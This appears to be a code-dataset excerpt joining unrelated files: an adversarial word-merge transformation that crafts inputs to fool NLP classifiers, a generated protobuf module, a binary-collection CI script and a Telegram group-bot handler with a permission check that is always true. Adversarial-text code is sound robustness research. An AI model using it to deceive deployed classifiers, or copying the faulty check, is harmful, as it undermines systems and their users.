        self, current_text: AttackedText, indices_to_modify: Sequence[int]
    ) -> List[List[str]]:
        """Get replacement words for each merge position using the masked LM.

        For every index in ``indices_to_modify`` the word at that index is
        replaced by the mask token and the following word is deleted; the
        model's top predictions for the mask become the candidates.

        Args:
            current_text: Text we want to get replacements for.
            indices_to_modify: indices of the left word of each merge pair.
        Returns:
            One list of candidate words per index (empty if the mask token
            was truncated away by `max_length`).
        """
        masked_texts = []
        for index in indices_to_modify:
            temp_text = current_text.replace_word_at_index(
                index, self._lm_tokenizer.mask_token
            )
            temp_text = temp_text.delete_word_at_index(index + 1)
            # Restrict the context passed to the model to the window.
            temp_text = temp_text.text_window_around_index(index, self.window_size)
            masked_texts.append(temp_text)
        i = 0
        # 2-D list: one list of replacement words per index to modify.
        replacement_words = []
        while i < len(masked_texts):
            inputs = self._encode_text(masked_texts[i : i + self.batch_size])
            ids = [
                inputs["input_ids"][k].tolist() for k in range(len(inputs["input_ids"]))
            ]
            with torch.no_grad():
                preds = self._language_model(**inputs)[0]
            for j in range(len(ids)):
                try:
                    # Need try-except b/c a mask token located past max_length
                    # may have been truncated by the tokenizer.
                    masked_index = ids[j].index(self._lm_tokenizer.mask_token_id)
                except ValueError:
                    replacement_words.append([])
                    continue
                mask_token_logits = preds[j, masked_index]
                mask_token_probs = torch.softmax(mask_token_logits, dim=0)
                ranked_indices = torch.argsort(mask_token_probs, descending=True)
                top_words = []
                for _id in ranked_indices:
                    _id = _id.item()
                    word = self._lm_tokenizer.convert_ids_to_tokens(_id)
                    if check_if_subword(
                        word,
                        self._language_model.config.model_type,
                        (masked_index == 1),
                    ):
                        word = strip_BPE_artifacts(
                            word, self._language_model.config.model_type
                        )
                    # Accept only confident, single-token, non-punctuation words.
                    if (
                        mask_token_probs[_id] >= self.min_confidence
                        and len(tokenize(word)) == 1
                        and not check_if_punctuations(word)
                    ):
                        top_words.append(word)
                    # Predictions are ranked, so once the confidence drops below
                    # the threshold (or we have enough candidates) we can stop.
                    if (
                        len(top_words) >= self.max_candidates
                        or mask_token_probs[_id] < self.min_confidence
                    ):
                        break
                replacement_words.append(top_words)
            i += self.batch_size
        return replacement_words

    def _get_transformations(
        self,
        current_text: AttackedText,
        indices_to_modify: Sequence[int],
        max_num: Optional[int] = None,
    ) -> List[AttackedText]:
        """Return the texts obtained by merging each mergeable adjacent pair.

        NOTE(review): like the upstream CLARE implementation, the merge
        positions come from POS tags over the *whole* text; ``indices_to_modify``
        and ``max_num`` are currently not used to restrict them.
        """
        # Find the adjacent pairs whose POS tags allow a merge.
        token_tags = [
            current_text.pos_of_word_index(i) for i in range(current_text.num_words)
        ]
        merge_indices = find_merge_index(token_tags)
        merged_words = self._get_candidates(current_text, merge_indices)
        transformed_texts = []
        for i in range(len(merged_words)):
            index_to_modify = merge_indices[i]
            word_at_index = current_text.words[index_to_modify]
            for word in merged_words[i]:
                # Drop any leftover BPE marker before comparison/insertion.
                word = word.strip("Ġ")
                if word != word_at_index:
                    temp_text = current_text.delete_word_at_index(index_to_modify + 1)
                    transformed_texts.append(
                        temp_text.replace_word_at_index(index_to_modify, word)
                    )
        return transformed_texts

    def extra_repr_keys(self) -> List[str]:
        """Attribute names included in this transformation's repr."""
        return ["masked_lm_name", "max_length", "max_candidates", "min_confidence"]
# Adjacency table for word merging: a pair of neighbouring words (w1, w2) is
# considered mergeable when the POS tag of w2 appears in the list keyed by
# the POS tag of w1 (consumed by find_merge_index below).
_merge_map = {
    UNIVERSAL_POSTAG.NOUN: [
        UNIVERSAL_POSTAG.NOUN,
    ],
    UNIVERSAL_POSTAG.ADJ: [
        UNIVERSAL_POSTAG.NOUN,
        UNIVERSAL_POSTAG.NUM,
        UNIVERSAL_POSTAG.ADJ,
        UNIVERSAL_POSTAG.ADV,
    ],
    UNIVERSAL_POSTAG.ADV: [
        UNIVERSAL_POSTAG.ADJ,
        UNIVERSAL_POSTAG.VERB,
    ],
    UNIVERSAL_POSTAG.VERB: [
        UNIVERSAL_POSTAG.ADV,
        UNIVERSAL_POSTAG.VERB,
        UNIVERSAL_POSTAG.NOUN,
        UNIVERSAL_POSTAG.ADJ,
    ],
    UNIVERSAL_POSTAG.DET: [
        UNIVERSAL_POSTAG.NOUN,
        UNIVERSAL_POSTAG.ADJ,
    ],
    UNIVERSAL_POSTAG.PRON: [
        UNIVERSAL_POSTAG.NOUN,
        UNIVERSAL_POSTAG.ADJ,
    ],
    UNIVERSAL_POSTAG.NUM: [
        UNIVERSAL_POSTAG.NUM,
        UNIVERSAL_POSTAG.NOUN,
    ],
}
def find_merge_index(
    token_tags: Sequence[Union[str, UNIVERSAL_POSTAG]],
    indices: Optional[Sequence[int]] = None,
) -> List[int]:
    """Return the positions i where words i and i+1 form a mergeable POS pair.

    A pair is mergeable when ``_merge_map`` lists the (normalized) POS tag of
    word i+1 under the (normalized) POS tag of word i. ``indices`` restricts
    the positions examined; by default every adjacent pair is checked.
    """
    if indices is None:
        indices = range(len(token_tags) - 1)
    mergeable = []
    for pos in indices:
        left = normalize_pos_tag(token_tags[pos])
        right = normalize_pos_tag(token_tags[pos + 1])
        if right in _merge_map.get(left, ()):
            mergeable.append(pos)
    return mergeable
| 36.635762 | 117 | 0.594179 |
f751465d345a5f6160d76c9bcda84e467b54713a | 6,322 | py | Python | finsky/protos/preloads_pb2.py | mmcloughlin/finsky | f21ccdbebf86e55a542c658b6972cb1f3fb5f119 | [
"MIT"
] | 59 | 2015-07-11T18:53:59.000Z | 2021-09-08T03:16:17.000Z | finsky/protos/preloads_pb2.py | mmcloughlin/finsky | f21ccdbebf86e55a542c658b6972cb1f3fb5f119 | [
"MIT"
] | 10 | 2015-07-01T08:09:29.000Z | 2021-12-06T01:23:00.000Z | finsky/protos/preloads_pb2.py | mmcloughlin/finsky | f21ccdbebf86e55a542c658b6972cb1f3fb5f119 | [
"MIT"
] | 14 | 2015-08-15T22:04:02.000Z | 2021-03-03T09:14:39.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: preloads.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import common_pb2 as common__pb2
# File descriptor for preloads.proto, reconstructed from its serialized form.
# NOTE: this module is protoc output ("DO NOT EDIT"); regenerate it from the
# .proto source rather than editing by hand.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='preloads.proto',
  package='Preloads',
  syntax='proto2',
  serialized_pb=_b('\n\x0epreloads.proto\x12\x08Preloads\x1a\x0c\x63ommon.proto\"\xa6\x01\n\x07Preload\x12\x1c\n\x05\x64ocid\x18\x01 \x01(\x0b\x32\r.Common.Docid\x12\x13\n\x0bversionCode\x18\x02 \x01(\x05\x12\r\n\x05title\x18\x03 \x01(\t\x12\x1b\n\x04icon\x18\x04 \x01(\x0b\x32\r.Common.Image\x12\x15\n\rdeliveryToken\x18\x05 \x01(\t\x12\x17\n\x0finstallLocation\x18\x06 \x01(\x05\x12\x0c\n\x04size\x18\x07 \x01(\x03\"c\n\x10PreloadsResponse\x12(\n\rconfigPreload\x18\x01 \x01(\x0b\x32\x11.Preloads.Preload\x12%\n\nappPreload\x18\x02 \x03(\x0b\x32\x11.Preloads.PreloadB,\n com.google.android.finsky.protosB\x08Preloads')
  ,
  dependencies=[common__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Descriptor for the Preloads.Preload message (protoc-generated; do not hand-edit).
_PRELOAD = _descriptor.Descriptor(
  name='Preload',
  full_name='Preloads.Preload',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='docid', full_name='Preloads.Preload.docid', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='versionCode', full_name='Preloads.Preload.versionCode', index=1,
      number=2, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='title', full_name='Preloads.Preload.title', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='icon', full_name='Preloads.Preload.icon', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='deliveryToken', full_name='Preloads.Preload.deliveryToken', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=_b("").decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='installLocation', full_name='Preloads.Preload.installLocation', index=5,
      number=6, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='size', full_name='Preloads.Preload.size', index=6,
      number=7, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=43,
  serialized_end=209,
)
# Descriptor for the Preloads.PreloadsResponse message (protoc-generated; do not hand-edit).
_PRELOADSRESPONSE = _descriptor.Descriptor(
  name='PreloadsResponse',
  full_name='Preloads.PreloadsResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='configPreload', full_name='Preloads.PreloadsResponse.configPreload', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='appPreload', full_name='Preloads.PreloadsResponse.appPreload', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=211,
  serialized_end=310,
)
# Resolve cross-file message-type references (Docid/Image live in common.proto)
# and register the message descriptors with the file descriptor.
_PRELOAD.fields_by_name['docid'].message_type = common__pb2._DOCID
_PRELOAD.fields_by_name['icon'].message_type = common__pb2._IMAGE
_PRELOADSRESPONSE.fields_by_name['configPreload'].message_type = _PRELOAD
_PRELOADSRESPONSE.fields_by_name['appPreload'].message_type = _PRELOAD
DESCRIPTOR.message_types_by_name['Preload'] = _PRELOAD
DESCRIPTOR.message_types_by_name['PreloadsResponse'] = _PRELOADSRESPONSE
# Materialize the concrete message classes from the descriptors.
Preload = _reflection.GeneratedProtocolMessageType('Preload', (_message.Message,), dict(
  DESCRIPTOR = _PRELOAD,
  __module__ = 'preloads_pb2'
  # @@protoc_insertion_point(class_scope:Preloads.Preload)
  ))
_sym_db.RegisterMessage(Preload)
PreloadsResponse = _reflection.GeneratedProtocolMessageType('PreloadsResponse', (_message.Message,), dict(
  DESCRIPTOR = _PRELOADSRESPONSE,
  __module__ = 'preloads_pb2'
  # @@protoc_insertion_point(class_scope:Preloads.PreloadsResponse)
  ))
_sym_db.RegisterMessage(PreloadsResponse)
# File-level options (java_package / java_outer_classname).
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n com.google.android.finsky.protosB\010Preloads'))
# @@protoc_insertion_point(module_scope)
| 38.084337 | 620 | 0.744543 |
a53ce7be6195464150bdfe487b473ae69a89da71 | 4,940 | py | Python | gitlab-ci/src/artifacts/collector.py | contropist/ic | 9240bea7dc0239fcbc5d43ad11f3ca803ee9bb11 | [
"Apache-2.0"
] | null | null | null | gitlab-ci/src/artifacts/collector.py | contropist/ic | 9240bea7dc0239fcbc5d43ad11f3ca803ee9bb11 | [
"Apache-2.0"
] | 4 | 2021-12-22T22:34:51.000Z | 2022-03-31T07:34:19.000Z | gitlab-ci/src/artifacts/collector.py | contropist/ic | 9240bea7dc0239fcbc5d43ad11f3ca803ee9bb11 | [
"Apache-2.0"
] | null | null | null | import logging
import multiprocessing
import os
import shutil
import tempfile
from os import path
from typing import List
from ci import cwd
from ci import ENV
from ci import log_section
from ci import mkdir_p
from ci import sh
def local(v: str) -> str:
    """Resolve *v* relative to the artifacts script directory under the repo root."""
    scripts_dir = path.join(ENV.top, "gitlab-ci/src/artifacts")
    return path.join(scripts_dir, v)
# Release binaries (from the cargo release target directory) that are
# collected, post-processed and uploaded as CI artifacts.
RUST_BINARIES = [
    "boundary-node-control-plane",
    "boundary-node-prober",
    "canister_sandbox",
    "e2e-test-driver",
    "ic-admin",
    "ic-btc-adapter",
    "ic-canister-http-adapter",
    "ic-consensus-pool-util",
    "ic-crypto-csp",
    "ic-cup-explorer",
    "ic-get-neuron-ids",
    "ic-nns-init",
    "ic-p8s-service-discovery",
    "ic-p8s-sd",
    "ic-prep",
    "ic-recovery",
    "ic-regedit",
    "ic-replay",
    "ic-rosetta-api",
    "ic-starter",
    "ic-test-bin",
    "ic-workload-generator",
    "orchestrator",
    "prod-test-driver",
    "replica",
    "sandbox_launcher",
    "state-tool",
    "system-tests",
    "vsock_agent",
]
# Binaries that must keep their debug info: they are only cleaned, never stripped.
DONT_STRIP = ["replica", "canister_sandbox", "ic-crypto-csp"]
# Nix store reference patterns that are allowed to be stripped from the
# binaries, keyed by build target triple (consumed by strip-references.sh).
STRIP_REFS = {
    "x86_64-unknown-linux-gnu": [
        "*-glibc-*",
        "*-gcc-*",
        "*-openssl-*",
        "*-libidn2-*",
        "*-binutils-*",
        "*-crates-io",
    ],
    "x86_64-apple-darwin": ["*-crates-io", "*-swift-corefoundation", "*-openssl-*"],
}
class Collector:
    """A script that collects a list of binaries, performs various transformations on them (see below), and puts them in `ARTIFACTS_DIR` so GitLab can detect and upload them."""

    artifacts_dir: str
    files: List[str]

    def __init__(
        self,
        artifacts_dir="artifacts/nix-release",
        files=RUST_BINARIES,
    ) -> None:
        """Remember the destination directory and create a scratch directory
        for the intermediate (stripped/patched) copies."""
        self.artifacts_dir = artifacts_dir
        self.files = files
        self.temp = tempfile.mkdtemp()

    @classmethod
    def collect(cls, artifacts_dir="artifacts/nix-release", files=RUST_BINARIES):
        """Entry point: run a collector inside a collapsible CI log section."""
        with log_section("Click here to see artifact processing output"):
            cls(artifacts_dir, files).run()

    def run(self):
        """Process every binary in parallel, then sign the results when the
        signing key is present (skipped for "malicious" artifact variants)."""
        with cwd(ENV.top):
            # This is the directory GitLab searches for artifacts once the job has completed
            self.out_dir = path.join(ENV.top, self.artifacts_dir)
            mkdir_p(self.out_dir)
            p = multiprocessing.Pool()
            try:
                p.map(self._process_one, self.files)
            except KeyboardInterrupt:
                p.terminate()
                p.join()
                raise
            else:
                # Shut the pool down cleanly on success; the original never
                # closed it, leaking the worker processes until exit.
                p.close()
                p.join()
            if "malicious" in self.artifacts_dir:
                return
            if path.exists("/openssl/private.pem"):
                sh(local("openssl-sign.sh"), self.out_dir)
            else:
                # logging.warn is a deprecated alias of logging.warning.
                logging.warning("/openssl/private.pem doesn't exist, so these artifacts won't be signed")

    def _process_one(self, binary: str):
        """Copy one binary into the scratch dir, transform it and gzip it
        into `out_dir`.

        Things done here:
        * Strip debuginfo from the binary (using objcopy or strip)
        * On Linux, run patchelf, so binaries built in nix-shell can run on other systems
        * On Darwin, fix dylibs, which accomplishes the same goal as the previous bullet point
        * If REALLY_STRIP is set, strip Nix store references and fail if there are any we don't recognize
          (disabled right now because the nix shell path ends up in every rpath for some reason)
        """
        src_path = path.join(ENV.target_dir, ENV.build_target, "release", binary)
        bin_path = path.join(self.temp, binary)
        if not os.access(src_path, os.R_OK):
            # Not every job builds every binary; a missing one is not fatal.
            logging.info(f"Binary not found at {src_path}")
            return
        shutil.copyfile(src_path, bin_path)
        if binary not in DONT_STRIP:
            self._strip_and_clean(bin_path)
        else:
            self._clean(bin_path)
        self._adjust_paths(bin_path)
        self._strip_refs(bin_path)
        # --no-name keeps the gzip output reproducible (no timestamp/filename).
        sh("pigz", "-c", "--no-name", bin_path, pipe_to=path.join(self.out_dir, f"{binary}.gz"))

    def _clean(self, in_path: str):
        """Remove non-deterministic sections (Linux only) without stripping debug info."""
        if ENV.is_linux:
            sh("objcopy", "-D", "-R", ".comment", "-R", ".note.gnu.build-id", in_path)

    def _strip_and_clean(self, in_path: str):
        """Strip debug info and remove non-deterministic sections."""
        if ENV.is_linux:
            sh("objcopy", "-D", "--strip-debug", "-R", ".comment", "-R", ".note.gnu.build-id", in_path)
        elif ENV.is_macos:
            sh("strip", "-S", in_path)

    def _adjust_paths(self, in_path: str):
        """Make the binary runnable outside the nix build environment:
        point the ELF interpreter at the system loader on Linux, or
        relocate dylib references on Darwin."""
        if ENV.is_linux:
            sh(
                "patchelf",
                "--remove-rpath",
                "--set-interpreter",
                "/lib64/ld-linux-x86-64.so.2",
                in_path,
            )
        else:
            sh(local("relocate-darwin-syslibs.sh"), in_path)

    def _strip_refs(self, in_path: str):
        """Strip Nix store references (opt-in via REALLY_STRIP), failing on
        any reference not whitelisted for the current build target."""
        if "REALLY_STRIP" in os.environ:
            sh(
                local("strip-references.sh"),
                in_path,
                env={"allowedStrippedRefs": " ".join(STRIP_REFS[ENV.build_target])},
            )
| 29.580838 | 192 | 0.582996 |
e2bfae6a42130b5e6e21aa1cdd6d320cb6f9251b | 15,006 | py | Python | handlers/all.py | hidarr/GANA | 36840fbf539a51bf68cd42f4d8b74524df6d97fa | [
"MIT"
] | null | null | null | handlers/all.py | hidarr/GANA | 36840fbf539a51bf68cd42f4d8b74524df6d97fa | [
"MIT"
] | null | null | null | handlers/all.py | hidarr/GANA | 36840fbf539a51bf68cd42f4d8b74524df6d97fa | [
"MIT"
] | null | null | null | from utlis.rank import setrank,isrank,remrank,remsudos,setsudo, GPranks,IDrank
from utlis.send import send_msg, BYusers, GetLink,Name,Glang,getAge
from utlis.locks import st,getOR
from utlis.tg import Bot
from config import *
from pyrogram.types import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json, datetime
import importlib
from os import listdir
from os.path import isfile, join
def allGP(client, message,redis):
    # Dispatcher for every plain group message: admin promotion, info/ID
    # commands, bot-wide and per-chat auto-replies, and dynamically loaded
    # plugin files.
    # NOTE(review): indentation reconstructed from a whitespace-stripped dump;
    # nesting (especially of the trailing plugin section) should be confirmed
    # against the upstream repository.
    type = message.chat.type
    userID = message.from_user.id
    chatID = message.chat.id
    username = message.from_user.username
    if username is None:
        username = "None"
    userFN = message.from_user.first_name
    title = message.chat.title
    rank = isrank(redis,userID,chatID)
    text = message.text
    # Arabic command patterns (c) and reply templates (r), imported lazily so
    # edits to the lang modules can be picked up at runtime.
    c = importlib.import_module("lang.arcmd")
    r = importlib.import_module("lang.arreply")
    # Per-user message counter for this chat.
    redis.hincrby("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID)
    if text :
        # --- promote a user to group admin (by @username, numeric id, or reply) ---
        if re.search(c.setGPadmin,text):
            if re.search("@",text):
                user = text.split("@")[1]
            if re.search(c.setGPadmin2,text):
                user = int(re.search(r'\d+', text).group())
            if message.reply_to_message:
                user = message.reply_to_message.from_user.id
            # No target resolved -> nothing to do.
            if 'user' not in locals():return False
            if GPranks(userID,chatID) == "member":return False
            Getus = Bot("getChatMember",{"chat_id":chatID,"user_id":userID})["result"]
            if Getus["status"] == "administrator" and not Getus["can_promote_members"]:return False
            try:
                getUser = client.get_users(user)
                userId = getUser.id
                userFn = getUser.first_name
                if GPranks(userId,chatID) != "member":return False
                pr = Bot("promoteChatMember",{"chat_id":chatID,"user_id":userId,"can_change_info":1,"can_delete_messages":1,"can_invite_users":1,"can_restrict_members":1,"can_pin_messages":1})
                if pr["ok"]:
                    T ="<a href=\"tg://user?id={}\">{}</a>".format(userId,Name(userFn))
                    Bot("sendMessage",{"chat_id":chatID,"text":r.prGPadmin.format(T),"reply_to_message_id":message.message_id,"parse_mode":"html"})
            except Exception as e:
                Bot("sendMessage",{"chat_id":chatID,"text":r.userNocc,"reply_to_message_id":message.message_id,"parse_mode":"html"})
        # --- "source" info card with inline buttons ---
        if re.search(c.sors,text):
            kb = InlineKeyboardMarkup([[InlineKeyboardButton("قناه السورس 📢", url="t.me/EEFFI")],[InlineKeyboardButton("بوت التواصل 💬", url="t.me/F96BOT")],[InlineKeyboardButton("المطور 💜", url="t.me/Eiitk")]])
            Botuser = client.get_me().username
            Bot("sendMessage",{"chat_id":chatID,"text":r.sors.format("@"+Botuser),"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
        if re.search(c.dellink,text):
            kb = InlineKeyboardMarkup([[InlineKeyboardButton(c.dellink2, url="https://telegram.org/deactivate")]])
            Botuser = client.get_me().username
            Bot("sendMessage",{"chat_id":chatID,"text":r.dellink,"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
        # --- show the command list for ranked users ---
        if re.search(c.ShowO,text) and (rank is not False or rank is not 0 or rank != "vip"):
            reply_markup = getOR(rank,r,userID)
            Bot("sendMessage",{"chat_id":chatID,"text":r.Showall,"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True,"reply_markup":reply_markup})
        # --- group statistics ---
        if text == "عدد الكروب" and (rank is not False or rank is not 0 ):
            from pyrogram.api.functions.channels import GetFullChannel
            chat = client.resolve_peer(chatID)
            full_chat = client.send(GetFullChannel(channel=chat)).full_chat
            Bot("sendMessage",{"chat_id":chatID,"text":r.gpinfo.format(message.chat.title,full_chat.participants_count,full_chat.admins_count,full_chat.kicked_count,full_chat.banned_count,message.message_id),"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True})
        # --- "my ID" card for the sender (optionally with profile photo) ---
        if text == c.ID and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID) and not message.reply_to_message:
            Ch = True
            # if redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
            t = IDrank(redis,userID,chatID,r)
            msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
            edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
            rate = int(msgs)*100/20000
            age = getAge(userID,r)
            if redis.hget("{}Nbot:SHOWid".format(BOT_ID),chatID):
                tx = redis.hget("{}Nbot:SHOWid".format(BOT_ID),chatID)
                # Translate admin-defined '#placeholder' tokens into str.format
                # fields before rendering the template below.
                rep = {"#age":"{age}","#name":"{name}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
                for v in rep.keys():
                    tx = tx.replace(v,rep[v])
            else:
                tx = r.IDnPT
            if not redis.sismember("{}Nbot:IDSendPH".format(BOT_ID),chatID):
                get = Bot("getUserProfilePhotos",{"user_id":userID,"offset":0,"limit":1})
                if get["ok"] == False:
                    Ch = True
                elif get["result"]["total_count"] == 0:
                    Ch = True
                else:
                    # Ch False => the photo reply below already covered it.
                    Ch = False
                    file_id = get["result"]["photos"][0][0]["file_id"]
                    Bot("sendPhoto",{"chat_id":chatID,"photo":file_id,"caption":tx.format(username=("@"+username or "None"),id=userID,stast=t,msgs=msgs,edits=edits,age=age,rate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
            if Ch == True:
                Bot("sendMessage",{"chat_id":chatID,"text":tx.format(username=("@"+username or "None"),id=userID,stast=t,msgs=msgs,edits=edits,age=age,rate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
            # if not redis.sismember("{}Nbot:IDSendPH".format(BOT_ID),chatID) and not redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
            # get = Bot("getUserProfilePhotos",{"user_id":userID,"offset":0,"limit":1})
            # if get["ok"] == False:
            # Ch = True
            # elif get["result"]["total_count"] == 0:
            # Ch = True
            # else:
            # Ch = False
            # reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.RIDPHs,callback_data=json.dumps(["ShowDateUser","",userID]))]])
            # file_id = get["result"]["photos"][0][0]["file_id"]
            # Bot("sendPhoto",{"chat_id":chatID,"photo":file_id,"caption":r.RID.format(userID),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
            # if Ch == True and not redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
            # reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.RIDPHs,callback_data=json.dumps(["ShowDateUser","",userID]))]])
            # Bot("sendMessage",{"chat_id":chatID,"text":r.RID.format(userID),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
        # --- show the sender's rank ---
        if text == "رتبتي":
            t = IDrank(redis,userID,chatID,r)
            Bot("sendMessage",{"chat_id":chatID,"text":f"⏏️꒐ رتبتك : {t}","reply_to_message_id":message.message_id,"parse_mode":"html"})
        # --- ID card for the replied-to user ---
        if text == c.ID and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID) and message.reply_to_message:
            us = message.reply_to_message.from_user.id
            rusername = message.reply_to_message.from_user.username
            if rusername is None:
                rusername = "None"
            t = IDrank(redis,us,chatID,r)
            msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),us) or 0)
            edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),us) or 0)
            rate = int(msgs)*100/20000
            age = getAge(us,r)
            tx = r.ReIDnPT
            Bot("sendMessage",{"chat_id":chatID,"text":tx.format(Reus=("@"+rusername or "None"),ReID=us,Rerank=t,Remsgs=msgs,Reedits=edits,Rage=age,Rerate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
        # --- ID card for an @username mentioned in the command ---
        if re.search(c.idus,text) and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID):
            user = text.split("@")[1]
            try:
                getUser = client.get_users(user)
                us = getUser.id
                rusername = user
                if rusername is None:
                    rusername = "None"
                age = getAge(us,r)
                t = IDrank(redis,us,chatID,r)
                msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),us) or 0)
                edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),us) or 0)
                rate = int(msgs)*100/20000
                tx = r.ReIDnPT
                Bot("sendMessage",{"chat_id":chatID,"text":tx.format(Reus=("@"+rusername or "None"),ReID=us,Rerank=t,Remsgs=msgs,Reedits=edits,Rage=age,Rerate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
            except Exception as e:
                print(e)
        # --- misc info commands ---
        if re.search(c.ShowSudos, text):
            tx = (redis.get("{}Nbot:SHOWsudos".format(BOT_ID)) or "")
            Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
        if text == c.mymsgs:
            get = redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID)
            Bot("sendMessage",{"chat_id":chatID,"text":r.yourmsgs.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
        if text == c.link and not redis.sismember("{}Nbot:showlink".format(BOT_ID),chatID):
            get = (redis.hget("{}Nbot:links".format(BOT_ID),chatID) or GetLink(chatID) or "none")
            Bot("sendMessage",{"chat_id":chatID,"text":r.showGPlk.format(get),"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True})
        if text == c.myedits:
            get = redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID)
            Bot("sendMessage",{"chat_id":chatID,"text":r.youredits.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
        if text == c.myaddcontact:
            get = redis.hget("{}Nbot:{}:addcontact".format(BOT_ID,chatID),userID)
            Bot("sendMessage",{"chat_id":chatID,"text":r.youraddcontact.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
        # --- bot-wide (global) auto-replies, unless disabled for this chat ---
        if not redis.sismember("{}Nbot:ReplySendBOT".format(BOT_ID),chatID):
            if redis.hexists("{}Nbot:TXreplys".format(BOT_ID),text):
                tx = redis.hget("{}Nbot:TXreplys".format(BOT_ID),text)
                try:
                    rep = {"#cn":"{cn}","#age":"{age}","#fn":"{fn}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
                    for v in rep.keys():
                        tx = tx.replace(v,rep[v])
                    Bot("sendMessage",{"chat_id":chatID,"text":tx.format(fn=userFN,username=("@"+username or "n"),id=userID,stast=IDrank(redis,userID,chatID,r),cn=title),"reply_to_message_id":message.message_id,"parse_mode":"html"})
                except Exception as e:
                    # Template rendering failed -> fall back to the raw text.
                    Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
